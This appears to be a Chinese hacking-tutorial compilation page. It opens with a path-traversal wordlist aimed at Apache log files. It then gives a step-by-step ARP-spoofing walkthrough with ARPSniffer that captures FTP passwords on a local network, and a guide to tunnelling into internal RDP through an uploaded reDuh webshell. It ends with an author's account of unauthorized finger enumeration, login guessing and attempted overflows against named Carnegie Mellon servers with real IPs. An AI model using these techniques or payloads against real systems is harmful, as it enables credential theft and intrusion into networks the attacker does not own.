../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
篇8:ARP监听渗透内网的方法网站安全
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
第一步:
tracert 61.139.1.1
C:/WIN2000/system32>tracert 61.139.1.1
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了
第二步:看本机IP设置和网卡情况
C:/WIN2000/system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73
说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65
第三步:查看本机时间
C:/WIN2000/system32>net time //127.0.0.1
//127.0.0.1 的当前时间是 2003/1/28 下午 09:13
命令完成成功
要注意的是这儿的时间是12小时式,用at命令应要24小时式
第四步:编写启动ARPsniffer的bat文件
C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat
注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
Usage: ArpSniffer [/RESET]
第五步:后台运行开始嗅探咯
C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat
注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
执行完第四步要先安装WINPCAP 2.1驱动
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:/winnt/system32>pulist
...................
conime.exe 248 NT AUTHORITY/SYSTEM
explorer.exe 1864 SMSCOMPUTER/Administrator
CSRSS.EXE 2256 NT AUTHORITY/SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了!
WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM
......................
杀了它
C:/winnt/system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
Process 2322 killed.
C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)
...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............
特别要注意的就是PASS哈:)
----------------------------------------------------
付录:
前台正常执行的显示
C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router....OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===>Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===>Mac of 61.139.1.88
有时这儿要先显示can not open driver(0)不管它等一下就可以了
Begin Sniffer.........
篇9:内网渗透利器reduh的使用方法网站安全
国外大牛的作品,偶顺手写了个使用说明,e文好的看原文 www.sensepost.com/research/reduh/
这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
本机-------客户端---------(http隧道)-----------服务端------------------内网服务器
服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上jdk。
把客户端文件解包,这里我把它放到e盘的test文件夹
把服务端的webshell上传到目标服务器
目标服务器在内网,开了终端服务。
命令行下用客户端连接服务端
e:\\test>java reduhclient 目标服务器域名 http 80 /webshell路径/reduh.asp
新开一个命令行,用nc连接本机1010端口,
h:\\>nc -vv localhost 1010
连接成功会有欢迎提示,之后输入命令
>>[createtunnel]1234:127.0.0.1:3389
前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。
成功后两个命令行窗口都会有成功提示。
这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。
数据的传递过程
需要注意的是用此工具转发数据速度很慢,连接的时候应尽量把mstsc的颜色设置调低些。
篇10:渗透全美计算机第一学校CMU网站安全
Author:Juliet
这是第一篇,
CMU英文可能大家都不知道,但是中文应该很多人都听过,就是卡内基梅隆大学。后面也简写为CMU,不要想成中国医科大。另外声明,检测是友情的,因为我还没结束,所以暂时未通知校方。但是大家看了以后,不要拿来做坏事,毕竟给我个面子哈。
这个应该属于Root+渗透技术之一吧。也许属于,虽然常渗透Linux,但是我并不太清楚到底root+入侵技术的范畴是什么。如果觉得在80端口的web安全上面转悠没意思了,这篇文章也许会有点启发。
这一篇只说第一个漏洞,注册用户信息泄漏问题。
CMU的服务器使用Unix支持以下几种协议的信息传输:
TCP/IP,SSL,SSH,Finger
这一篇我们只讲Finger协议里面的问题。
Finger是个古老的协议,古老到已经很少有人记得他。不过同其他协议一样,需要支持。CMU使用的是zero finger提供的服务。
并不是说选择这个服务不明智。要知道,一切漏洞都是人产生的而不是计算机。暴露的问题起在于无论学校内外都可以查询计算机内注册用户的信息。而且错误信息中夹杂着可供继续渗透的信息。CMU这个古老而强大的全美计算机第一的学校让我很吃惊。
下面讲步骤。
打开开始菜单的运行。输入CMD运行。(如果你是Linux,我就不告诉你后面的步骤了,你要来问我我就敲死你。)
输入以下命令: finger -l 0@www.cmu.edu用0来list出host上的所有用户注册信息是zero finger的专属。
列出来的东西可能有点多,多的到了cmd翻页。实际上总共是反回了57KB的可以称得上隐私的数据。不过这些东西无伤大雅。因为在美国,你可以随时查到城市里其他人的联系方式。不过如果我是管理员,我会限制外部使用finger的0命令来禁止list。
好戏才开始。 finger -l administrator@www.cmu.edu一开始我以为是正确信息,不过我老大却说,这是错误信息!因为administrator换成root重新连还是一样的信息。
不过返回的信息确实是对服务器不利。
计算机名,目录,shell还有个ece.cmu.edu,呵呵。这可能预示着我可以继续渗透,方法有2。
入侵Casio或者继续Linux渗透。如果我是管理员,我会把返回的错误信息中的有关安全的信息去掉。可惜我不是。
我的直觉是,细心+耐心可能会进内网。不过后面的漏洞让我觉得可能会更简单了。就是OpenSSH版本过低。这就是我的第二篇要讲的问题了。
昨晚和Dreama交流了下,他们这样看来基本上没有不能入侵的机器了。其实Unix-to-Unix的传输协议并不是不安全,它就好像TCP/IP一样不完美。再多说句就是,Linux和windows间没有谁更安全,一个漏洞少但是全内核级,一个内核的不多但是到处是漏洞。都可以被入侵,都可以很安全。不安全的是管理员太2加不重视。
另外感谢YoCo Smart的帮助。
之前小白的那篇只是开了个头。然后我继续搞了下,
也还没成功,都是差一点人品。不过差一点也是差,没什么好推脱的,就是本事不济。
第一台是主站www.cmu.edu,ip为128.2.10.162
第二台为www.emc.cmu.edu,ip为128.2.129.29
第一台有个OpenSSH溢出,但是我,还有自诩作战营唯一精通Linux渗透的小白,还有其他人,都不会用这个漏洞。漏洞参考在这里:
marc.info/?l=openbsd-misc&m=106375456923804&w=2
既然这样就算了,通过别的机器渗透就是了。
第二个目标,上面已经列出来了。这台机器https:443、www:80、smtp:25、pop3:110、ssh:22、cmd:514、ftp:21、telnet:23、finger:79、ntp:123居然全开了。。。不过值得一提的是X-Scan提示ftpd里面的glod有溢出。我一直不明白这个溢出是怎么回事。所以一开始还是用的finger。
C:\\>finger 0@128.2.129.29
[128.2.129.29:79]
Login Name TTY Idle When Where
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
然后继续:
C:\\>finger root@128.2.129.29
[128.2.129.29:79]
Login Name TTY Idle When Where
root Super-Userpts/17 butter.ece.cmu.
root存在。那么再打开telnet。
输入:
open 128.2.129.29
提示:
telnetd: Authorization failed.
遗失对主机的连接。
按任意键继续...
应该是ntlm身份验证为3,没办法,只能以参数unset ntlm登录。但是返回信息还是遗失。。。根本无视我的ip,可恶。。
好吧,从ftp登录。
ftp,输入命令:
open 128.2.129.29
登录成功,但是要求身份验证。从root到各个学院的名称,猜遍了,名字还是不对。名字都出不来,更别说密码了。
不过还是回头看看那个glod吧。
ftp建立连接后,输入glod,调配开关啊。。。好,溢出它。glod ~{
溢出失败。。。
这台机器到此结束,费了我好长时间。。谁有兴趣谁继续猜吧。
glod溢出相关文献:www.nsfocus.net/vulndb/2021
★ 网站安全责任书
★ 技术安全评语
★ 物流信息化新思路
★ 安全技术交底制度
3389新思路 SQL渗透的一些技术网站安全(精选10篇)




